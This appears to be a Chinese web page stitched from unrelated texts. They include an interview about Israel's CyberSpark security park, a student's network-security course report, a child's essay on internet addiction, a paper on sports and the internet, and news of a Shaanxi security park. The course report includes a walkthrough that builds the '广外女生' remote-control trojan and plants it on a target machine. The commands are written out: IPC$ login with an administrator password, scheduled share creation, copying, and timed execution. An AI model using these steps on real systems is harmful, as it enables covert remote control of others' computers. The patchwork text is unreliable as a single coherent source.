[2]黄淑萍.第三方物流的信息化及信息系统构建[J].山西财经大学学报 (高等教育版) , 2008, (2) .
[3]服装纺织行业管理信息系统应用[Z].
美国科技媒体CSOonline曾发布了全球主要网络安全厂商的数量和分布,美国稳稳地坐上头把交椅,其次是坐拥228家厂商的以色列,网络安全厂商数量比后面5个国家的厂商数量的总和还多。
不过,以色列星火网络产业园CEO罗尼·哲哈尼接受《支点》记者专访时称:“这个统计数据是不准确的,我们已经拥有超过400余家网络安全企业。以色列网络信息安全产业的快速发展的关键,核心在于生态系统的构建。”
在网络安全产业方面,以色列的企业集中聚集在南部城市贝尔谢巴的网络星火产业园(Cyberspark)。仅2015年,这里就有81家新的网络安全初创企业诞生,吸引外资总额达全球网络安全行业总投资额的20%。
不仅以规模和数量取胜,以色列网络安全产业结构也很完善,其在基础设施保护、云计算、终端保护、威胁情报、应用(App)保护、工控系统、物联网、智能汽车等各个领域,都有涉足。
每天发生5万起网络袭击
《支点》:近年来发生的震网病毒(Stuxnet)、维基解密、斯诺登事件等一系列事件,使全球各国网络信息安全的形势发展日益严峻。您如何理解网络安全问题?
罗尼·哲哈尼:如果要理解网络安全问题,我们可以用医学作为一个参照物。医学行业没有地理界限,共同分享信息与合作,网络安全也是如此。
在医学上,细菌都是我们生活的组成部分,网络安全也是一样。我们从小教育孩子饭前要洗手,如厕后也要洗手,同样我们还应当教育他们打开邮件时,要小心防范网络安全病毒。
但是我们看到,医学与网络安全又大不同。医疗是一个有着上百年发展史的产业,它在研究、标准、科技等方面积累了深厚的经验,而网络安全产业也就近十年以来才得到快速发展。
就是这短短十年,我们承担的网络安全任务是巨大的。数据显示,世界上每天发生的网络安全袭击大约5万起。
我们还看到,中国的医生要获得职业资格认证才能上岗,这和以色列的做法是一样的。我们对医生的考核方式也是一样的,因为全球有统一的标准。但是全球网络安全标准的制定,还属一片空白。
《支点》:那么从全球看,目前有没有一个处理网络安全标准的机构呢?
罗尼·哲哈尼:目前,全球各国正在积极制定网络安全标准。但是我们看到,在网络安全领域制定标准实在太难,我们每天都会面对新的网络病毒的安全威胁。
我认为,当前给网络安全立法也是个难题,因为立法程序根本跟不上网络威胁的变化。你想控告黑客都很难,没有办法把他送上法庭,因为法律跟不上网络安全变化的“步伐”,黑客到底犯了什么罪,在法律层面还没有具体解释。
《支点》:我们如何去克服这些困难呢?
罗尼·哲哈尼:我们享受高科技带来的便捷生活,同时又面临着网络安全防护的难题。我们要想克服这些困难,就要学会合作与信息共享,因为网络袭击不仅仅发生在中国、以色列,每个国家都会遇到。从医学的发展史看,人类一直展开紧密合作,共同攻克多项世界性医学难题,网络安全发展也应当如此。但目前来看,我们的合作还不够多。
集群推动生态发展
《支点》:从2011年起,以色列在世界范围内率先制定并颁布网络空间国家战略,目前以色列已形成了运转良好的网络安全生态系统。作为网络星火产业园首任CEO,您如何解读以色列在网络安全产业领域对生态系统的打造呢?
罗尼·哲哈尼:我认为这一生态系统包含四大要素:良好的教育体系、注重研发的产业力量、活跃的风险投资、政府的强力支持。
首先是人才与人力资源。目前,位于贝尔谢巴的本·古里安大学拥有在校生约2万名,它虽然是以色列最年轻的大学,但它专攻应用科学研究,特别是和企业一同展开合作与研发。例如在2003年,德国电信就与本·古里安大学签署长期合作研究协议,每年德国电信派遣企业高管来大学与研究人员共商下一年度的研究重点。一旦研究重点确定后,德国电信将支付包括设备、人力等方面的所有研究经费。类似协议,在本·古里安大学超过500项,覆盖各个学科,以及各行业领域的企业。
在人力资源领域,网络安全产业需要聪明的大脑。我们需要吸引有创新精神、冒险精神的人才。
一项有意思的问卷调查显示,在美国,中学生选择长大后成为医生、记者、艺术家、工程师、网络安全职业等等项目中,网络安全是他们最不愿意选择的。但在以色列,这恰恰相反。
此外,迁来贝尔谢巴的2.5万名以色列军队士兵,也是“网络星火产业园”最宝贵的资源之一。每年退役后的士兵人数众多,直接向“网络星火产业园”中的企业源源不断地提供高质量人才。
其次是产业与科研。由于以色列源源不断产出“物美价廉”的人才资源,目前思科、EMC、谷歌、微软、IBM、甲骨文、德国电信、洛克希德·马丁等知名公司,都在“网络星火产业园”建立了网络安全研发中心。许多西方公司还通过并购以色列本土公司,获取以色列的人才。
在“网络星火产业园”,不仅有知名公司,还有刚起步的创业公司,整个产业园的产业是多样化的。我们与西方国家公司合作,使得以色列的网络安全行业和人能与国际前沿科技和发展无缝接轨。
再次是活跃的风险投资。著名的耶路撒冷风投合伙企业JVP,专门在“网络星火产业园”建有一个网络安全企业孵化器,资助大学实验室中诞生的想法和科研成果转化为产品和服务。
不少网络安全企业周围都有不止一位投资者或投资机构,这足以体现以色列网络安全行业充满活力。据以色列市场研究机构IVC统计,从2011年开始,有超过230位当地或外国投资者对以色列网络安全企业作出了投资。
nlc202309081616
最后就是以色列政府的强力支持。例如以色列政府为在“网络星火产业园”落户的每一家高科技企业,均提供长达七年的员工薪水退税折扣。按照以色列政府的计划,以色列国家计算机应急响应中心也将落户于“网络星火产业园”。
在“网络星火产业园”中,大学、产业、风险投资、政府这四个要素紧密地构成一个整体,形成一个正向循环。例如,每个月“网络星火产业园”中企业的CEO、政府官员、大学教授都要坐在一起相互交流近况,沟通各自的需求,探讨合作的机会。
《支点》:我们知道,以色列成立了国家网络安全管理局,管理网络安全产业的发展。一个非常重要的问题就是,政府在网络安全领域应该扮演什么样的角色?
罗尼·哲哈尼:在武汉开会期间,我了解到中国缺少约140万的网络安全人才。在美国,这一人才缺口约18万。这不只是中国、美国的问题,全世界都缺少网络安全人才。
解决网络安全人才缺口问题的首要责任在政府,只有政府才有能力进行决策和投资。在教育上,从中学、职业学校到大学,这样一个长周期的学习过程,需要政府资金的投入。
在以色列,我们成立了网络安全管理局,它管理着网络安全领域的方方面面,包括教育、人力资源、研发等资金的流动,以及税收鼓励政策、法律法规,甚至国防。网络安全管理局有权利和资金,来出台政策或实施战略规划。
物联网、运输、医疗是热门领域
《支点》:您这次来武汉参观并考察了武汉数十家网络安全领域的企业,对武汉网络信息安全产业有哪些方面的印象?
罗尼·哲哈尼:我来中国多次,但到武汉还是首次,武汉已给我留下深刻印象。这里有大学城,有产业园区,有很好的企业。这里的网络信息安全产业已万事俱备,只欠东风,会形成很好的网络安全生态系统。
我们还要看到,网络信息安全产业生态系统的构建,不仅仅局限于某个生态圈内,还应当是跨区域的,比如与加拿大、西班牙、澳大利亚等国展开协同合作。我这次来到武汉,也希望能与武汉的企业展开合作。
《支点》:从全球发展趋势看,目前以色列“网络星火产业园”正在关注哪些领域的网络热点?
罗尼·哲哈尼:对于网络安全最新热点,或者是网络安全危机的最新动向来说,我认为国家与国家的区别不会太大,因为我们使用的最新技术都是一样的。如果一定要我说出当前的网络安全领域的热点,我认为是物联网、运输、医疗三大领域,因为这些行业对网络信息安全应用的意识还不够。
我想要举出一个事例:当我们把急诊病人需要的心脏从15公里外调运到急诊室时,医生可以通过软件以及编程来发出指令。由于黑客的原因,一些人可能会拦截程序的发送,这直接威胁到了病人的生命。
银行业最了解网络安全应用的重要性,而最不了解或是最缺乏网络安全意识的是医疗行业。这为网络信息安全产业留下了巨大的发展空间。(支点杂志2016年12月刊)
一、实验目的及要求
该专周的目标是让学生掌握网络安全的基本框架,网络安全的基本理论。以及了解计算机网络安全方面的管理、配置和维护。
本课程要求在理论教学上以必需够用为原则,应尽量避免过深过繁的理论探讨,重在理解网络安全的基本框架,网络安全的基本理论。掌握数据加密、防火墙技术、入侵检测技术以及学习网络病毒防治。了解Windows 2000的安全、Web的安全、网络安全工程以及黑客常用的系统攻击方法。本课程要求学生对计算机的使用有一定了解(了解Windows的使用,具有键盘操作和文件处理的基础),并已经掌握计算机网络的基本原理。
二、专周内容
1、安全需求分析
(1)网络安全问题主要集中在对服务器的安全保护、防黑客和病毒、重要网段的保护及管理安全上。因此,我们必须采取相应的安全措施杜绝安全隐患,其中应该做到:
A、公开服务器的安全保护 B、防止黑客从外部攻击 C、入侵检测与监控 D、病毒防护 E、数据安全保护 F、网络的安全管理
(2)解决网络安全问题的一些要求
A、大幅度地提高系统的安全性(重点是可用性和可控性);
B、保持网络原有的特点,即对网络的协议和传输具有良好的透明性,能透明接入,无需更改网络设置;
C、易于操作、维护,并便于自动化管理,而不增加或少增加附加操作;
D、尽量不影响原网络拓扑结构,同时便于系统及系统功能的扩展;
E、安全保密系统具有较好的性能价格比。一次性投资,可以长期使用;
F、安全产品具有合法性,及经过国家有关管理部门的认可或认证;
(3)系统安全目标
A、建立一套完整可行的网络安全与网络管理策略;
B、将内部网络、公开服务器网络和外网进行有效隔离,避免与外部网络直接通信;
C、建立网站各主机和服务器的安全保护措施,保证他们的系统安全;
D、加强合法用户的访问认证,同时将用户的访问权限控制在最低限度;
E、全面监视对公开服务器的访问,及时发现和拒绝不安全的操作和黑客攻击行为;
F、加强对各种访问的审计工作,详细记录对网络、公开服务器的访问行为,形成完整的系统日志;
2、网络拓扑
3、网络安全的基本内容
(1)基本网络命令
A、ping命令: ping –t IP,向指定的计算机不停的发送数据包,按Ctr+Break快捷键可以查看统计信息并继续运行,按 Ctr+C可中止运行。
B、Tracert命令:tracert IP 显示从本地计算机到目标服务器所经过的计算机:
C、pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%
(2)操作系统安全
A、屏蔽不需要的服务组件
开始——程序——管理工具——服务 出现以下窗口:
然后在该对话框中选中需要屏蔽的程序,并单击右键,然后选择“停止”命令,同时将“启动类型”设置为“手动”或“已禁用”,这样就可以对指定的服务组进行屏蔽了。B、关闭默认共享:“开始”——“程序”——“管理工具”——“服务”——“Server”
(3)数据库系统安全
A、使用安全的帐号策略和Windows认证模式
由于SQL Server不能更改sa用户名称,也不能删除这个超级用户,所以,我们必须对这个帐号进行最强的保护,当然,包括使用一个非常强壮的密码,最好不要在数据库应用中使用sa帐号,只有当没有其它方法登录到 SQL Server 实例(例如,当其它系统管理员不可用或忘记了密码)时才使用 sa。可以新建立一个拥有与sa一样权限的超级用户来管理数据库。安全的帐号策略还包括不要让管理员权限的帐号泛滥。
SQL Server的认证模式有Windows身份认证和混合身份认证两种。在任何可能的时候,应该对指向SQL Server的连接要求Windows身份验证模式。
Windows认证模式比混合模式更优越,原因在以下:
1)它通过限制对Microsoft Windows用户和域用户帐户的连接,保护SQL Server免受大部分Internet工具的侵害。
2)服务器将从Windows安全增强机制中获益,例如更强的身份验证协议以及强制的密码复杂性和过期时间。
3)使用Windows认证,不需要将密码存放在连接字符串中。存储密码是使用标准SQL Server登录的应用程序的主要漏洞之一。
4)Windows认证意味着你只需要将密码存放在一个地方。
要在SQL Server的Enterprise Manager安装Windows身份验证模式,步骤操作: 展开服务器组——右键点击服务器——然后点击“属性”——在安全性选项卡的身份验证中——点击“仅限Windows”。(4)网络防火墙工具:红墙主机网络防火墙 安装
1.具体操作如下:
第一步: 将“爱思红墙主机网络防火墙”的安装光盘插入驱动器,运行根目录下的Setup文件来运行其安装程序,进入“爱思红墙主机网络防火墙安装”窗口;
第二步:
在“欢迎安装爱思红墙主机网络防火墙”对话框中,单击“下一步”按钮;
第三步: 在“软件许可协议”对话框,接受协议点击“是”;
第四步: 点击“是”按钮,出现显示您计算机的相关信息,即判断是否可以安装本软件;
第五步: 单击“下一步”按钮,出现“选择目标位置”对话框;
第六步: 在该对话框中,单击“浏览”按钮,并在“选择文件夹”对话框中选择盘符作为驱动器,再指定相应的文件夹及路径,然后单击“确定”按钮;
第七步: 单击“下一步”按钮,出现“选择安装程序名称”对话框,您可自定义程序名称;
第八步: 单击“下一步”按钮,系统开始复制文件;
第九步: 进入“红墙主机网络防火墙配置”窗口,作出是否运行“红墙应用程序扫描系统”的选择后,点击“完成”。
相关设置:告警设置:系统提供了两种情况下的告警,即需要系统告警和不需要系统告警,您可据需要选取告警设置。
点击主界面中的“规则管理”按钮,弹出相应窗口,如下图:
网络监控中心:
(5)网络攻击工具:“广外女生”
它的基本功能有:文件管理方面有上传,下载,删除,改名,设置属性,建立文件夹和运行指定文件等功能;注册表操作方面:全面模拟WINDOWS的注册表编辑器,让远程注册表编辑工作有如在本机上操作一样方便;屏幕控制方面:可以自定义图片的质量来减少传输的时间,在局域网或高网速的地方还可以全屏操作对方的鼠标及键盘,就像操纵自己的计算机一样;远程任务管理方面,可以直观地浏览对方窗体,随意杀掉对方窗体或其中的控件;其他功能还有邮件IP通知等。
主要步骤:首先运行“gwg.exe”,出现如图窗口:
选中“服务端设置”,生成“GDUFS.exe”木马:
然后将“GDUFS.exe”复制到自己的C盘中,再根据一些命令把“GDUFS.exe”复制到目标主机的盘中,再进行运行。目标主机的IP:191.168.12.38 具体步骤及命令:
“开始”——“运行”——“cmd”
命令:net use 191.168.12.38ipc$ 123 /user:administrator 与目标主机之间建立联系
命令:net time 191.168.12.38 获取目标主机的时间
命令:at 191.168.12.38 08:21 net share c$=c: 与目标主机的C盘建立通道
命令:copy c:GDUFS.exe 191.168.12.38c$ 复制“GDUFS.exe”文件到目标主机的C盘中:
命令:191.168.12.38 10:49 c:GDUFS.exe 指定“GDUFS.exe”在目标主机中什么时候运行。
三、专周小结:
通过这次网络安全专周,我不仅仅是学到了很多知识,更是透彻的理解到了网络安全对生活已经将来工作的意义。
网络安全分为软件网络安全和硬件网络安全。一般我们说的网络安全就是软件上的网络安全,即局域网,互联网安全。
网络安全又分为内网安全和外网安全。在内外网安全中,内网安全则是重中之重。毕竟是家贼难防。据不完全统计,全国因为内网安全的问题,至少每年算是几亿美元。所以,网络安全特别重要。
至于在将来的工作中,我们也要严格尊市网络设备管理原则和使用秩序,对设备进行统一管理专人负责,严格要求自己对设备进行安全操作,保持强烈的责任感和服务意识,做好每一个细节,重点做好以下几项工作:
1,及时准确判断网络故障,做好上门维护工作或及时提醒网络合作商进行维护。
2,定期检查维护各网络设备的运行情况并进行维护。3,不定期对服务器进行更新和检查。
4,遇到特殊情况,及时向领导和老师汇报,努力提高应急处理问题和独立处理问题的能力。
这段电影讲了怎样戒网瘾。上网可以让人们知道自己解不开的题,还可以玩游戏,查一些书籍,还能在网上淘宝,购买自己喜欢的东西,价格要比外面便宜。当然,网上也有许多烦恼,比如:被黑客窃取自己的个人信息和文件,被一些人网上诈骗。有时电脑还被一些病毒攻击,网站打不开这一系列问题,还有的青年天天在网吧里玩游戏连吃饭也是在网吧里吃的,成绩大幅度下降,爸妈在外找他都不知道。
当我看完过后,我深有体会:如果没有电脑,人的死亡录就会下降,但也就会没有这么多的好处,所以,千万不要相信别人的谎言,也不要没天没夜的.玩游戏,应该只玩几小时或不玩我们幼小的心是不能承受这么大的打击的,有的人因为没有钱去网吧里上网,只有偷或抢别人的钱财,还有的竟然去xx来赚钱。有的人还因为爸妈不准他玩游戏而吵架,吵得凶的还要与父母大大出手,一场灾难就降临了。上网是有限度的,我们不能因为玩电脑而戴上沉重的眼镜,我们要学会保护眼睛爱护眼睛,不能上不健康的网站。
1 网络信息条件下, 有利于体育传播业的发展
1.1 体育传播业是现代体育和网络相互契合, 互促发展的新兴传播行业
首先体育的发展需要网络信息这个工具进行传播。比如, 在很多体育表演、体育赛事活动中, 很多热门运动项目往往受到众多体育爱好者的关注, 但体育活动场地空间容量是有限的, 即使大型的体育场馆, 也不过最多能够容纳几万人, 很难满足广大体育爱好者者的观赏、观赛需求, 而且现代体育的发展, 使得对体育的热爱已经突破了国界和种族, 所以必须需要一种手段, 来满足场外观众的对热门体育赛事活动的信息关注, 而网络信息的传播正迎合也解决了这个矛盾, 因此, 网络成为体育传播的重要手段, 成为一种必不可少的手段。同时, 网络信息需要具备其生存与发展的生产途径, 而体育传播是实现网络信息发展的一个途径, 由此产生发展了体育传播业, 而且随着体育事业的发展, 广大群众对体育需求的日益强烈, 体育传播业的发展也日趋蓬勃。
1.2 网络信息传播的手段, 在体育传播业得以迅速发展的必要条件
在网络不发达时期, 体育信息的传播信息首先要通过人为加工, 制作成体育新闻、体育节目才以无线电台、报纸传递给人们, 随着电视的普及, 体育电视直播虽然缩短了体育传播的时间, 但与现代互联网传播信息相比, 却显得大为逊色, 互联网传播条件下的体育传播, 体现出即时、快捷、图文并茂的特点, 呈现出多画面、多角度、动态传播的特征, 它不断传播快捷、频率高、内容广、流量大, 而且具有与体育现场的互动功能, 方便了体育爱好者对赛事活动现场的疑问、兴趣和预知情况的询问、了解, 表现出较强的信息传播中的交互性特点, 展现出网络传播的不可比拟的优势, 受到广大体育观众的欢迎, 由此也给体育传播业的发展带来无限的生机与效益
2 网络信息条件下, 有利于体育资源的整合与综合利用
我国具有丰富的可开发、可利用的体育资源, 在网络条件下, 通过建立国家体育部门与其他部门之间、国家体育部门之间、国家体育部门与地方体育部门的沟通, 可以形成一个具有广泛联系的网络体系, 从而形成强大而综合的体育资源。其中由于体育部门同社会互联网的联通, 有利于公共体育资源的向社会的开放, 方便了向大众提供体育资源服务。在这种网络条件下的资源共享服务中, 网络信息条件特有强大的信息检索功能, 可以使体育消费者达到速度更快、更便捷的消费满足。其中容量巨大的共享网络资源库, 可以为广大体育消费者提供更为丰富的体育消费内容, 体育服务部门、企业借助多方面的力量, 可以提升体育资源的综合利用和开发, 为社会提供更为丰富的体育产品, 提高整个体育行业的社会影响和经济效益。
3 网络信息条件下, 有利于体育服务产品的开发
体育产品涉及非常多的类型和层面, 既有群众参与性的体育产品, 也有群众观赏性的体育产品, 体育产品的开发程度也受到多方面因素的影响和制约。
(1) 体育产品开发中的市场调研, 需要网络的支持。体育产品开发前对市场供需情况、产品结构、产品发展趋势等要进行市场调研, 而通过网络信息的调查、统计, 其调查、统计可以不受空间距离限制和时间限制, 往往得到较大范围体育爱好者的响应和支持, 而这种虚拟状态下的调查, 往往调研的结果更准确, 更加贴近市场的实际状况, 同时也可以提高市场调研的效率。
(2) 体育产品开发中需要借鉴和了解相关体育产品信息, 只有了解市场上推出的现有产品, 才能进行产品是否具有适应性的预测, 才能生产出超越他人的更好产品。所以通过网络中的搜索引擎, 可以超越时间和空间的限制, 了解目前推向市场的体育产品信息, 利用网络手段可以不失为一种效率高、方便的手段, 它可以减少产品开发的成本, 提高产品开发的效率。同时, 体育产品开发中的策划、设计、运行试验等都需要网络信息这个工具来完成, 利用网络信息条件的体育产品开发, 不但效率高、而且有利于提高产品的新颖性、现代性, 使塑造出的体育产品更趋向完美, 更加适应广大消费者需求。
4 网络信息条件下, 有利于体育产品的推介与营销
体育产品要推向市场, 就要被广大消费者认知, 尤其是新开发的体育服务产品, 要尽快打开市场, 取得消费者的接纳, 就应当借助网络信息的优势。
(1) 网络信息条件下, 可以使体育产品得到全方位展示。体育服务产品具有服务性特征, 只有消费者在消费过程中, 才能得到其价值、功能的体现, 才能展现出体育产品的特色和优势。所以要将体育产品向广大消费者推介, 就要全面展示其各种特质和特色, 而网络信息的图文并茂的动态传播形式, 为体育产品的宣传提供了条件。可以通过对消费者消费过程的镜头回放, 在网络中传递给消费者, 可以通过解说员在网络中的绘声绘色的广而告之, 使消费者了解体育产品, 使消费者得到产品的初步感知和认识。
(2) 网络环境推介下, 能够扩大体育产品的宣传范围。网络传播的特点就是其突破了空间的限制, 使得产品宣传信息在地域空间上无限扩大, 其使得无论身处何处的互联网用户, 都成为体育产品宣传的受众人群, 这种网络环境的推介, 大大扩展了产品广告宣传的范围, 提升了宣传的效果。
(3) 网络信息条件下, 可以实现体育服务企业与消费者的信息互动。体育服务企业与消费者的信息互动, 是体育企业与消费者就服务产品进行信息收集和信息反馈的过程, 它是体育服务企业了解体育服务产品需求与评价信息的重要途径, 同时也是消费者主动向体育服务企业体育需求和表达产品满意程度的形式, 通过这种互动, 可以促进体育服务企业进行产品研发, 促进服务质量的提高, 同时能够使消费者通过提供服务企业提出的诉求, 达到消费的满足。在网络信息条件下, 体育服务企业与消费者可以实现互联网在线即时互动, 及时沟通, 改变了传统的时间上的间隔和等待, 提升了他们之家信息交流的效率, 尤其是对于体育服务企业的营销服务质量的改善, 实现销售策略的及时调整起到了积极的作用。
5 网络信息条件下, 有利于体育管理水平的提升
要提高体育产业的发展水平, 必须提高体育服务企业的管理。体育服务企业的管理实质是对企业经济决策的管理过程, 它离不开信息收集、信息的整理、信息的分析、信息的处理, 这些都离不开借助网络信息条件。在体育服务企业管理过程中, 通过网络信息条件, 可以实现对体育投资策划、生产运行管理、产品开发管理、营销过程监督等。作为体育企业来说, 管理的过程就是决策的过程, 网络信息评估, 网络信息评价是管理、决策过程必不可少的决策工具, 决策者应充分利用生产过程、管理过程中出现的数据资料, 通过网络及时传输信息, 处理信息, 以此来指导企业的生产和管理, 优化经营管理的技术和手段, 从而达到合理地使用人力、物力、财力, 可以有效地指导企业从事管理、生产、投资等决策活动, 实现决策风险管理, 减少风险决策失误, 使决策能达到以最小的成本获得最大的安全保障目标, 最终提升体育管理的经济效益。
参考文献
[1]李芳, 尹龙, 司虎克.政府体育部门网络信息资源建设评价概述[J].科技情报开发与经济, 2009.
今年年初,中国互联网络信息中心(CNNlC)发布的《第27次中国互联网络发展状况统计报告》显示:2010年,中国4.57亿网民中,遭遇过病毒或木马攻击的网民比例为45.8%,有过账号或密码被盗经历的网民占21.8%……形势严峻的“信息安全”问题已成为横亘我国信息化快速发展道路上的一大问题。而此间诞生在西安浐灞的陕西国家安全产业园对西部乃至全国的信息安全产业发展都将起到极为重要的推动作用。
2011年7月15日-16日,当世界园艺博览会在西安浐灞生态区绚丽绽放之际,一个高朋满座,泰斗云集的项尖IT峰会——2011中国(西安)信息安全产业高峰论坛暨陕西国家信息安全产业园项目启动仪式也在此盛大举行。云计算、黑客渗透等热点网络安全论题开坛讨论;16家国内知名的信息安全企业签订入驻……论坛一改纯粹的学术探讨,围绕信息安全主题,还特意增设了网络高手互动环节,让与会嘉宾零距离感受信息安全的重要性。
这是一场高规格的信息安全盛会,中国工程院院士、中科院院士、国家信息工程技术研究中心等国内信息安全方面的超级院士、专家齐聚西安,共同探讨“信息安全与数字生活”带给人们的便捷和困惑,为陕西信息产业园发展把脉。
亮点10院士专家受聘为产业园把脉
此次高峰论坛,由西安浐灞生态区管理委员会联手国家信息安全工程技术研究中心、中国电子商会、中国发展与改革研究院共同举办,陕西东方信息安全产业基地有限公司、陕西东方信息安全研究院承办。旨在进一步统筹资源、整合优势,并加快陕西国家信息安全信息产业园的建设步伐。
这样一个高科技产业园区的发展建设,必然离不开众多权威专家强有力的技术支持。论坛上,应邀前来的众多院士、专家,成为论坛上一道亮丽的风景。陕西国家信息安全产业园现场为中国工程院院士魏正耀、国家信息安全工程技术研究中心主任文仲慧、西安电子科技大学博士生导师王育民教授、国家信息安全工程技术研究中心总工程师郭晓雷、国家信息安全工程技术研究中心研究员王文举、陕西省电子学会副理事长兼学术工作委员会主任裴昌幸教授、中国人民解放军某部队专业技术少将张凌强、上海交通大学信息安全学院副院长李建华、二炮装备部原总工程师李呈良、中国电子动漫秘书长陈一鸣等10名院士、专家颁发了聘书,这是陕西国家信息安全产业园对各位院士专家的托付,更是各位院士专家对陕西国家信息安全产业园的一个庄严承诺。
对决“网络高手PK”揭示信息安全重要性
网络,作为现代社会的筋脉无疑成为本次信息安全的“重锤之音”。为此论坛特设“电脑密码破译大赛”环节,未来的信息安全专家们在这里为大家上演了一场掷地有声的密码角逐。
参赛的5名选手分别来自北京、西安、南京、杭州,他们都属于民间网络高手,为赢取主办方提供的包括lPhone4等大奖一决高下。在现场竞赛中,主办方在现场设置了一台服务器,在服务器内设置一个文本文档,里面写有奖品箱的密码,最先进入服务器拿到密码的参赛者即为获胜。为体现比赛的公正性,主办方特邀西安电子科技大学教授、博导王育民现场为比赛的服务器设置通关密码。最终,来自北京的19岁选手“厮守”拔得头筹,抢先破译密码,获得价值2万元的超级梦幻大奖。
作为本次活动的胜出者,厮守在赛后接受央视主持人姚雪松采访时表示,从中国目前情况看,对网络的安全重视不如其他国家的,举办这样一个活动让大家知道了密码破解是什么样的过程,让大家知道以后怎么样让自己的密码更安全。
高潮16企业入驻领航信息安全
在当天的启动仪式上,包括中国发展和改革研究院、中国国家信息安全测评认证中心西北测评中心等在内的16家企业作为第一批入园企业现场签约,签约金额约28亿元。而在、浐灞生态区的支持下,国家信息安全工程技术研究中心、中国电子商会、中国发展与改革研究院与陕西东方信息安全产业基地有限公司将斥巨资倾力打造这一全国最大的信息安全高科技产业园区。产业园将建设陕西国家信息安全中心园区、信息安全工程技术研发中心、金融信息安全产业园区、国际动漫产业园区、电子信息产业园、全球呼叫信息服务中心园、信息安全教育园、汽车信息安全产业园等十六大功能园区。建设总投资150亿元。预计到2016年,产业园将实现年产值过百亿元,引进和培育各类信息安全企业300家,信息安全产业及相关从业人员将达到12万人。
纵观全国,目前已经拥有天津西青区学府示范工业园、成都国家信息安全成果产业化(四川)基地等信息安全产业集群。但是,此次启动的陕西国家信息安全产业园项目将以5000亩的占地规模,成为国内信息安全产业集群的领头羊。陕西东方信息安全产业基地有限公司董事长兼总经理罗鹏斌表示:产业园将按照逐步成名,初具规模、初见成效的发展目标,一步一个脚印,通过产业园的建设,为中西部和国内外信息安全企业开创一个四通八达的平台,成为国内领先、国际一流的技术水平超级园区。
亮剑浐灞布局战略性新兴产业
只有超前的意识才能引领时代的发展,才能彰显“会当凌绝顶”的魅力与霸气。浐灞生态区正是以审时度势的目光,在十二五规划前期就在北翼规划了“战略性新兴产业园区”,而信息产业则当之无愧成为首位“客人”,使得信息安全产业与沪灞生态区在十二五期间的产业发展定位也高度偶合。作为世园会的举办地,浐灞生态区率先承接世园会效应,勇担引领西安国际化大都市建设的引擎和排头兵重任,引领西安国际化浪潮。
浐灞生态区整合区域优势资源,着力推进“一地三城”建设,以打造现代服务业新高地为重点,建设高端金融商务城、才智经济创新成,生态宜居示范城。不断优化产业布局,扩大产业规模,提升产业层次。目前生态区已经取得国家级生态区称号,但还将继续加强流域生态治理和区域环境污染综合防治,大力发展战略性新兴产业、信息技术产业及环保产业,鼓励清洁能源和再生能源使用,完善城市森林体系,实现区域生态环境的休养生息。
而据记者进一步了解,在本次启动仪式上除了签约的16家企业外,还有十余家信息安全领域的高科技企业作为观察员的身份列席本次会议,有望成为后续入园企业,相信还有更多的信息企业也将逐步青睐这里。
愿景产业园将提升国家综合竞争力
【网络信息安全产业园】推荐阅读:
网络信息安全问题就是12-03
信息网络安全分析01-18
网络信息安全小论文02-20
网络信息安全培训材料03-08
网络与信息安全技术小结06-06
网吧网络与信息安全制度09-14
网络信息安全培训计划09-28
《网络信息安全》期末复习总结01-11
电子商务网络信息安全01-20
强化网络信息安全管理02-02
